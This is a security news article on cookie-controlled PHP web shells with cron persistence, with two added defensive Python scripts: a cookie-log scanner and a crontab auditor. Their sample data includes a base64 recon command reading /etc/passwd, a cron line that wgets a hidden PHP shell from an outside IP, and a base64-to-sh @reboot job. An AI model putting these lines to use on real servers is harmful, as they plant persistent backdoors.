Microsoft Details Linux Server Web Shells Using Cookies

Security researchers have identified a new method threat actors are using to maintain persistent access to compromised Linux servers. According to findings from the Microsoft Defender Security Research Team, attackers are deploying PHP-based web shells that use HTTP cookies as a covert control channel for remote code execution.

This technique represents a shift in how malicious web shells operate on Linux systems. Traditionally, these backdoors accept commands through URL query parameters, which appear in every access log, or through data in POST request bodies. The newly documented method instead keys on values supplied in HTTP cookies, both to gatekeep (the shell stays inert unless a request carries the expected cookie) and to trigger malicious code execution.

Technical Details of the Attack Method

The web shells are designed to be stealthier by blending their command and control traffic with normal web traffic. By using cookies, which are routinely exchanged between browsers and servers, the malicious communications can be harder to distinguish from legitimate activity on network monitoring tools.

Once established on a server, these web shells achieve persistence through a common Linux scheduling utility known as cron. The attackers use cron jobs to periodically check for and re-install the web shell, ensuring it remains active even if the initial point of entry is discovered and removed. This combination of cookie-based control and cron-based persistence creates a resilient threat for server administrators.

Implications for Server Security

The discovery underscores the evolving tactics of cybercriminals targeting web infrastructure. Linux servers, which power a significant portion of the internet’s backend infrastructure, are a high-value target. The use of cookies as a control mechanism complicates detection, as security software scanning for malicious URL patterns may not inspect cookie values with the same scrutiny.

Security teams monitoring for anomalous activity are advised to expand their scrutiny to include cookie data in web server logs. One caveat: the default Apache and nginx access-log formats record the request line, referrer and user agent but not the Cookie header, so capturing it requires a custom log format (Apache's %{Cookie}i, nginx's $http_cookie) or a reverse proxy or WAF that logs request headers. Unusually large or complex cookie values, or cookies containing encoded or encrypted data that is repeatedly sent to specific PHP files, could be indicators of this type of compromise.
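The following is an added example of the log review described above, not code from Microsoft or from this report. It assumes the Cookie header has been logged with a custom Apache format (noted in the code), and the log lines, the hidden PHP file name and the client addresses are constructed for illustration. It parses each request to a .php path, scores every cookie value for size, base64-like shape and character entropy, and raises an alert only when the same client keeps sending a suspicious cookie to the same PHP file.

```python
"""Flag cookie values that look like a covert command channel to PHP files.

Constructed example, not code from Microsoft or from the page. It assumes the
web server logs the request Cookie header with a custom Apache format such as
#   LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Cookie}i\"" withcookie
The default combined format does not record cookies at all.
"""
import base64
import math
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<cookie>[^"]*)"$'
)
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

# Constructed operator command, used only to build a realistic cookie value.
ENCODED_CMD = base64.b64encode(
    b"id; uname -a; cat /etc/passwd; ls -la /var/www/html").decode()


def _line(ip, path, cookie, ts="10/Mar/2025:10:15:01 +0000"):
    return f'{ip} - - [{ts}] "POST {path} HTTP/1.1" 200 512 "{cookie}"'


# Constructed sample log: two ordinary requests, then four hits on a hidden
# PHP file (hypothetical name) carrying a base64 command in cookie "c".
SAMPLE_LOG = [
    _line("198.51.100.23", "/index.php",
          "PHPSESSID=3f9a1b2c4d5e6f7a8b9c0d1e2f3a4b5c"),
    _line("198.51.100.23", "/wp-login.php",
          "wordpress_logged_in_a1b2=admin%7C1700000000%7Cabcdefabcdef%7Cdeadbeefdeadbeef"),
] + [
    _line("203.0.113.5", "/wp-content/uploads/.cache.php",
          f"PHPSESSID=9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f; c={ENCODED_CMD}")
    for _ in range(4)
]


def shannon_entropy(s):
    """Bits per character; a simple 'complexity' score for a cookie value."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_cookies(header):
    """Split 'a=1; b=2' into a dict; values are kept raw (no URL decoding)."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies


def cookie_reasons(value, max_len=256, enc_min_len=48, entropy_min=4.5):
    """Reasons a single cookie value looks like carried payload, or []."""
    reasons = []
    if len(value) > max_len:
        reasons.append("oversized")
    if len(value) >= enc_min_len:          # short session IDs are ignored
        if BASE64_RE.match(value):
            reasons.append("base64-like")
        if shannon_entropy(value) >= entropy_min:
            reasons.append("high-entropy")
    return reasons


def scan_log(lines, min_hits=3):
    """One alert per (client, PHP path, cookie name) seen >= min_hits times."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0]
        if not path.endswith(".php"):
            continue
        for name, value in parse_cookies(m.group("cookie")).items():
            reasons = cookie_reasons(value)
            if reasons:
                hits[(m.group("ip"), path, name)].append(reasons)
    alerts = []
    for (ip, path, name), seen in hits.items():
        if len(seen) >= min_hits:
            alerts.append({"ip": ip, "path": path, "cookie": name,
                           "count": len(seen),
                           "reasons": sorted({r for rs in seen for r in rs})})
    return sorted(alerts, key=lambda a: -a["count"])


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

The repetition threshold matters: a single long cookie is common (analytics, framework session blobs), so the script keys on the same client hitting the same PHP file with the same suspicious cookie name several times, which is the pattern the report describes. Thresholds such as the 48-character floor and the 4.5-bit entropy cut-off are starting points to tune against a site's own legitimate cookies.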

Microsoft’s research team did not attribute the activity to a specific threat group, suggesting the technique may be in use by multiple actors. The findings were shared to raise awareness within the global cybersecurity community and help organizations bolster their defenses.

Recommended Defensive Measures

Experts recommend several steps to mitigate this threat. Regular auditing of cron jobs on all Linux servers is essential to identify unauthorized scheduled tasks; that means reviewing /etc/crontab, /etc/cron.d and the /etc/cron.hourly, cron.daily, cron.weekly and cron.monthly directories as well as the per-user crontabs (typically under /var/spool/cron/crontabs on Debian-derived systems and /var/spool/cron on Red Hat-derived ones), with particular attention to jobs that run as the web server account. Server administrators should also implement strict file integrity monitoring on web directories to detect unauthorized PHP file uploads or modifications.
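As an added example of the cron audit recommended above and of the re-install behaviour described earlier in this article, the script below is not Microsoft's tooling or code from this report. It parses crontab text in either the system format (which carries a user column) or the per-user format, and flags commands that fetch, decode or write PHP under a web root. The web-root paths, tool names, sample entries and the hidden file name are all assumptions made for the example.

```python
"""Audit crontab text for jobs that re-install PHP into a web root.

Constructed example, not Microsoft's tooling or code from the page. Reads
crontab content in system format (/etc/crontab, /etc/cron.d/*: user column
present) or per-user format (crontab -l: no user column) and flags commands
matching the re-install pattern. Web roots, tool names and the sample
entries are assumptions.
"""
import os
import re
import shlex

WEB_ROOTS = ("/var/www", "/srv/www", "/usr/share/nginx", "public_html", "htdocs")
FETCH_TOOLS = {"curl", "wget", "fetch"}
_ROOTS = "|".join(map(re.escape, WEB_ROOTS))
PATTERNS = [
    ("writes-php-in-webroot", re.compile(r"(?:%s)\S*\.php\b" % _ROOTS)),
    ("base64-decode", re.compile(r"base64\s+(?:-d|--decode)\b|base64_decode")),
    ("php-inline-eval", re.compile(r"\bphp\s+-r\b")),
    ("hidden-php-file", re.compile(r"/\.[^/\s]+\.php\b")),
]
ENV_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")   # SHELL=..., PATH=...

# Constructed /etc/crontab: two stock Debian lines, one re-install job run as
# the web server account, one @reboot job piping base64 into a shell.
SAMPLE_SYSTEM_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/5 *   * * *   www-data  [ -f /var/www/html/wp-content/uploads/.cache.php ] || wget -q -O /var/www/html/wp-content/uploads/.cache.php http://198.51.100.7/c.txt
@reboot         root    echo aWQ= | base64 -d | sh
"""


def parse_crontab(text, system_format=False):
    """Entries as dicts: lineno, schedule, user (None per-user), command."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or ENV_RE.match(line):
            continue
        nsched = 1 if line.startswith("@") else 5     # @reboot, @hourly, ...
        maxsplit = nsched + (1 if system_format else 0)
        fields = line.split(None, maxsplit)
        if len(fields) != maxsplit + 1:
            continue                                  # malformed line
        entries.append({
            "lineno": lineno,
            "schedule": " ".join(fields[:nsched]),
            "user": fields[nsched] if system_format else None,
            "command": fields[-1],
        })
    return entries


def flag_entry(entry):
    """Reasons this entry looks like web-shell re-install persistence, or []."""
    cmd = entry["command"]
    reasons = [name for name, rx in PATTERNS if rx.search(cmd)]
    try:
        tokens = shlex.split(cmd)
    except ValueError:                 # unbalanced quotes: naive fallback
        tokens = cmd.split()
    uses_fetch = any(os.path.basename(t) in FETCH_TOOLS for t in tokens)
    if uses_fetch and any(root in cmd for root in WEB_ROOTS):
        reasons.append("fetch-into-webroot")
    minute = entry["schedule"].split()[0]
    if reasons and (minute == "*" or minute.startswith("*/")):
        reasons.append("high-frequency")  # severity modifier, never alone
    return reasons


def audit_crontab(text, system_format=False):
    """Flagged entries with their reasons, in file order."""
    report = []
    for entry in parse_crontab(text, system_format):
        reasons = flag_entry(entry)
        if reasons:
            report.append(dict(entry, reasons=reasons))
    return report


if __name__ == "__main__":
    for hit in audit_crontab(SAMPLE_SYSTEM_CRONTAB, system_format=True):
        print(f"line {hit['lineno']} user={hit['user']}: {hit['reasons']}")
```

Running it over the real files is a matter of feeding each one in with the right format flag: system_format=True for /etc/crontab and everything in /etc/cron.d, False for the output of `crontab -l -u <user>`. The "high-frequency" tag is only attached when another reason fires, since every-minute jobs are common and only interesting when they also touch a web root.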

Furthermore, web application firewalls (WAFs) should be configured to inspect and potentially block requests containing suspicious cookie payloads; a rule set that only examines the URL and POST parameters will not see this channel. Keeping server software, including the PHP interpreter, fully patched removes known vulnerabilities that attackers often exploit to gain an initial foothold, though patching alone does not evict a web shell that is already in place, which is what the cron auditing and file integrity checks are for.

The investigation into this technique is ongoing within the cybersecurity industry. Researchers anticipate that detailed indicators of compromise (IOCs) and more specific detection rules for security tools will be published by Microsoft and other security firms in the coming weeks. Organizations reliant on Linux-based web hosting are encouraged to review their current logging and monitoring capabilities in preparation.

Source: Microsoft Defender Security Research Team